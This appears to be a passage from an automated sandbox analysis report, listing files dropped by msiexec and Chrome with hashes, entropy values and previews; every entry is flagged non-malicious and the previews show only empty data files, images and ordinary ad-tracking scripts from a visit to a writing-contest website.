                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                            Entropy (8bit):1.4600594674739582
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:R8Ph/uRc06WXOQnT5rNp1SaS59oraSaSIKhP6:sh/1enTNNDQ7Gy
                                                                                                                                                                                            MD5:8664416E6AB935DB8F1B24A9A9EB5381
                                                                                                                                                                                            SHA1:FE79013DAF93460BCA50728BD8CB08A0F42EA668
                                                                                                                                                                                            SHA-256:B51A5CEBD90300920E7FB99DF8F99B10221CB5184C31293B52F6D88696663154
                                                                                                                                                                                            SHA-512:1A1888059B99648AF05AF08F08D8E43815B556AF23B6C1BBE35DA894C10E72D0D4313DF61344FB4660F456AEC400FF8FDA59613674050F3256FD4146D7A5F5FE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                            Entropy (8bit):1.1777735119969592
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:YenuksrMLFXO3T5uNp1SaS59oraSaSIKhP6:fn16TgNDQ7Gy
                                                                                                                                                                                            MD5:548E9A2ECE8D794B405EE9FD438CD800
                                                                                                                                                                                            SHA1:820DE93CF6143105147B3D293893BE1E14202558
                                                                                                                                                                                            SHA-256:B1D0EAD743BDE96F9AF63ABC55DADA9B7B477E33D8B4A02F8B18A95272274003
                                                                                                                                                                                            SHA-512:98EF53CA2F7A74ABBE66F4A1F637E0FA20A180CE89CC7DE510BC8B3321893C385D3C3D5D551BAD70B238FC7D47757E896F92CEE1AC888E6BAF67409EA5A91073
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                            Entropy (8bit):1.4600594674739582
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:R8Ph/uRc06WXOQnT5rNp1SaS59oraSaSIKhP6:sh/1enTNNDQ7Gy
                                                                                                                                                                                            MD5:8664416E6AB935DB8F1B24A9A9EB5381
                                                                                                                                                                                            SHA1:FE79013DAF93460BCA50728BD8CB08A0F42EA668
                                                                                                                                                                                            SHA-256:B51A5CEBD90300920E7FB99DF8F99B10221CB5184C31293B52F6D88696663154
                                                                                                                                                                                            SHA-512:1A1888059B99648AF05AF08F08D8E43815B556AF23B6C1BBE35DA894C10E72D0D4313DF61344FB4660F456AEC400FF8FDA59613674050F3256FD4146D7A5F5FE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                            Entropy (8bit):1.1777735119969592
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:YenuksrMLFXO3T5uNp1SaS59oraSaSIKhP6:fn16TgNDQ7Gy
                                                                                                                                                                                            MD5:548E9A2ECE8D794B405EE9FD438CD800
                                                                                                                                                                                            SHA1:820DE93CF6143105147B3D293893BE1E14202558
                                                                                                                                                                                            SHA-256:B1D0EAD743BDE96F9AF63ABC55DADA9B7B477E33D8B4A02F8B18A95272274003
                                                                                                                                                                                            SHA-512:98EF53CA2F7A74ABBE66F4A1F637E0FA20A180CE89CC7DE510BC8B3321893C385D3C3D5D551BAD70B238FC7D47757E896F92CEE1AC888E6BAF67409EA5A91073
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):512
                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3::
                                                                                                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                            Entropy (8bit):1.4600594674739582
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:R8Ph/uRc06WXOQnT5rNp1SaS59oraSaSIKhP6:sh/1enTNNDQ7Gy
                                                                                                                                                                                            MD5:8664416E6AB935DB8F1B24A9A9EB5381
                                                                                                                                                                                            SHA1:FE79013DAF93460BCA50728BD8CB08A0F42EA668
                                                                                                                                                                                            SHA-256:B51A5CEBD90300920E7FB99DF8F99B10221CB5184C31293B52F6D88696663154
                                                                                                                                                                                            SHA-512:1A1888059B99648AF05AF08F08D8E43815B556AF23B6C1BBE35DA894C10E72D0D4313DF61344FB4660F456AEC400FF8FDA59613674050F3256FD4146D7A5F5FE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):512
                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3::
                                                                                                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):512
                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3::
                                                                                                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                            Entropy (8bit):0.06828383727066611
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOzdocyc6Vky6lZ:2F0i8n0itFzDHFzd3dZ
                                                                                                                                                                                            MD5:5CD9C8F7905B4EC26AAF91F648420D08
                                                                                                                                                                                            SHA1:1CED899B8DD453A3764971685CAE63F18D0B7EBD
                                                                                                                                                                                            SHA-256:C0CC5DE726F8E098F0D6713B8B3E514E3DF162C1E51227A8FDA12CE0928AAB32
                                                                                                                                                                                            SHA-512:5D65DD20DEFCFCC741A55BDDFFFF97F6E025B5A2891919D68E3895D43D9126F4AF487FD3C8BEEB662C89062599AA23ED6677BDD7022526CC9026CD8BB686F364
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                            Entropy (8bit):1.1777735119969592
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:YenuksrMLFXO3T5uNp1SaS59oraSaSIKhP6:fn16TgNDQ7Gy
                                                                                                                                                                                            MD5:548E9A2ECE8D794B405EE9FD438CD800
                                                                                                                                                                                            SHA1:820DE93CF6143105147B3D293893BE1E14202558
                                                                                                                                                                                            SHA-256:B1D0EAD743BDE96F9AF63ABC55DADA9B7B477E33D8B4A02F8B18A95272274003
                                                                                                                                                                                            SHA-512:98EF53CA2F7A74ABBE66F4A1F637E0FA20A180CE89CC7DE510BC8B3321893C385D3C3D5D551BAD70B238FC7D47757E896F92CEE1AC888E6BAF67409EA5A91073
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):512
                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3::
                                                                                                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):69632
                                                                                                                                                                                            Entropy (8bit):0.10231230626640336
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:F3KFgKpSaipV+SaipV7V3+bwGblrkgA+++FP4:F6FgKpSaS0SaS59orApV
                                                                                                                                                                                            MD5:E159DF127F1FBF9F08E3F17DA760A283
                                                                                                                                                                                            SHA1:23B504BFC2B099F56A2D3EEC49B9D269A3345A0D
                                                                                                                                                                                            SHA-256:65D5997640443CF46AFB3D908B95AD6CBA715EDFD3EF198876D4AAC4DD7D5C37
                                                                                                                                                                                            SHA-512:8331A2C226B20E974D5F54875BD9B4803E6789701CBD15EFFFD59DF97CC8C94F3E6BDE3B2EDF423A9B73C8D4A5D0F429575916202A42CB180869FF1A8DA57A50
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):512
                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3::
                                                                                                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=176, yresolution=184, resolutionunit=2], baseline, precision 8, 970x250, components 3
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):149028
                                                                                                                                                                                            Entropy (8bit):7.9597557722494585
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:quIeSCrVIE+2OK02rI4AOPnuKPH96gsrjcad4pZ3zABDnJe8GTQuaEFBJ:quIzCZI+Q+uQ96brAad4piBrJe8GTQ2J
                                                                                                                                                                                            MD5:CFFC0CCBB836EE0E07077C0B39809617
                                                                                                                                                                                            SHA1:0438CFD0F06ABA8945BCF2963A4198568EAD9BEF
                                                                                                                                                                                            SHA-256:8C690B568C6AA7112B6107A1690F4C521337AF9F25AB3F3E639CBB941F9E39CC
                                                                                                                                                                                            SHA-512:59C9FDE6D4EED4E3B05EB14646F03428C119FD3029B00D6921BE7767AB980D5BBB869B2C76D70B2192CA860132DAE4A5E28DB26902235A393A9872E6F65743C8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:......JFIF..............Exif..II*...........................................(.......................i.......V.................0231....................0100........................................;...........`.......`.......ASCII...xr:d:DAFyqFYetss:7,j:4019870225152668762,t:23102919.....http://ns.adobe.com/xap/1.0/.<x:xmpmeta xmlns:x='adobe:ns:meta/'>. <rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang='x-default'>Wergle Flomp 2024 Top Banner with Art 3 (970 x 250 px) - 1</rdf:li>. </rdf:Alt>. </dc:title>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2023-10-29</Attrib:Created>. <Attrib:ExtId>57568078-949c-4751-bb
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (815)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):3501
                                                                                                                                                                                            Entropy (8bit):5.383873370647921
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:EI5cZUiKliCJ86U+QTEVWfeLwTauSEegdkZ5edOIC:EI5hiWNJ8kQTEVWfeUauRfdkZ5edO1
                                                                                                                                                                                            MD5:147FD3B00C22BA9C939712E9213C24CA
                                                                                                                                                                                            SHA1:3B48369B86FA0574F35379AACD1F42CC9C98A52B
                                                                                                                                                                                            SHA-256:70F5B11C1870CF90201A6D5F770CA318A3FA5827C74A8765EDE22B487F7D4532
                                                                                                                                                                                            SHA-512:E8419A71232EDAC8FD131446777F7D034B3171EFE07B3267479B439E4982650DB65A0D1DDC9F516315D5ED1B01ECFD2F7EB55D75D44AA51EE0AD494D441586D2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.googletagmanager.com/static/service_worker/4al0/sw_iframe.html?origin=https%3A%2F%2Fwinningwriters.com
                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html>.<head>. <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon">.</head>.<body>. <script>.'use strict';class m{constructor(a){this.j=a;this.g={};this.h={};this.i=0;this.id=String(Math.floor(Number.MAX_SAFE_INTEGER*Math.random()))}}function n(a){return a.performance&&a.performance.now()||Date.now()}.var p=function(a,b){class d{constructor(c,g,f){this.failureType=c;this.data=g;this.g=f;this.h=new m(n(f))}s(c,g){const f=c.clientId;if(c.type===0){c.isDead=!0;var e=this.h,h=n(this.g);e.g[f]==null&&(e.g[f]=0,e.h[f]=h,e.i++);e.g[f]++;c.stats={targetId:e.id,clientCount:e.i,totalLifeMs:Math.round(h-e.j),heartbeatCount:e.g[f],clientLifeMs:Math.round(h-e.h[f])}}c.failure={failureType:this.failureType,data:this.data};g(c)}}return new d(5,a,b)};/*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/.let q=globalThis.trustedTypes,r;function t(){let a=null;if(!q)return a;try{const b=d=>d;a=q.createPolicy("goog#html",{createHTML:b,createScript:b,crea
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 630 x 61, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3039
                                                                                                                                                                                            Entropy (8bit):6.964926146847287
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:Z/67VQ5inqknA9W+uiWebQvxWt1wcJ3JTeo3eHa3xWlHEe3q4d22YTCO7j+IGyVV:ZSS4qknmW+5bQJWt1wY61H+WlHEeMP7D
                                                                                                                                                                                            MD5:4457A3EDC2E882E8792FF143FB346776
                                                                                                                                                                                            SHA1:B59ADCDFEA1DC59FF4B4DD0512BB0326CD533D71
                                                                                                                                                                                            SHA-256:F3FFCB54E15BD6DD63D725F62B8204685D27C082438B83A0ECDF9C9D7B0229FF
                                                                                                                                                                                            SHA-512:E1184D51B892FF0F2B110C312D9BECF13237F8C5513B6B5B66525137862B03E8E12278D317E3D456B1CD8E1AC69769ADF84E5DFD941C1CF58E922C0460EC8175
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...v...=..... T$.....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:C508247BAB39DE11919BBBE5BE681828" xmpMM:DocumentID="adobe:docid:photoshop:037e068a-d332-634c-aaeb-8b5e51f7b915" xmpMM:InstanceID="xmp.iid:4041514f-4335-40a2-bd63-a8547abf188b" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmp:Create
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):86
                                                                                                                                                                                            Entropy (8bit):4.779486743739521
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:YTyLV/Vf1+xNVcSLQzRE9LduVB4:YWLV91iDLQmpdIB4
                                                                                                                                                                                            MD5:EA03273602AC31C0858FA2D9A1895526
                                                                                                                                                                                            SHA1:4F8AFE25482A22C6858AF1F58E55D83F9DF9B854
                                                                                                                                                                                            SHA-256:98D77039EA9249B3DCE91AD7B467EE382F29DAA61213C3E2737BD4A8786C8801
                                                                                                                                                                                            SHA-512:77FF06E103CA553FAD14E5F865764CDA76777F83800C439ED91B22B26935146863F9D0C3BBBD3EE95E02C69A1A1C29D0C12A5D9B9D1D619CEEBCF1DCCB422238
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:{"version_hash":"49267bce","url":"https://www.redditstatic.com/ads/49267bce/pixel.js"}
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4885), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4885
                                                                                                                                                                                            Entropy (8bit):5.817213623105432
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRUneRtytU79I:1DY0h8Rx47OIqWbZ2eRtyr
                                                                                                                                                                                            MD5:0B06DF17CEE24ABE1EF62AC42B53C661
                                                                                                                                                                                            SHA1:B9B7555BD7D2907E58468364ADC297D1A8E7CB3F
                                                                                                                                                                                            SHA-256:0DD252010B3B8048180BB22A29323D0E8782D8A04F3CBBFC5873AE5D460F2063
                                                                                                                                                                                            SHA-512:356959C57F888E0306F63A88B63A5D0AC9AB01F1C99B98D8083A00043E6D6C6E2C1FF836049DCEE3D3771364FD42B7DF537A27090CEC6A09E6EE145C9DFA321B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072733940/?random=1731960078431&cv=11&fst=1731960078431&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                            Entropy (8bit):2.7773627950641693
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                            MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://td.doubleclick.net/td/rul/1072733940?random=1731960062417&cv=11&fst=1731960062417&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
                                                                                                                                                                                            Preview:<html></html>
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (15345)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):415835
                                                                                                                                                                                            Entropy (8bit):5.650884071119622
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:h4rDi3NDXB0lIpPzEeRIB7mP9BxTr81KfcdM8:6rmdN0IpwoW3
                                                                                                                                                                                            MD5:F3B93CE87E019CAD5FF620ED6D26E72A
                                                                                                                                                                                            SHA1:45D8D78FB0DEC53307F5BF89B3E3707ADE3CB202
                                                                                                                                                                                            SHA-256:EF78080CF6F010ADA42DE8FEDCB224F02DD0B1AF1ECC4067EA5477FCFFCAB466
                                                                                                                                                                                            SHA-512:FE084B8EC3057A05793B643BDFA911977CB466C4D97FFB586829E6EC817A1CEA0882D052EDA2286C0A75D6512323BF993BBCE011834626CC989A38E545CE813A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
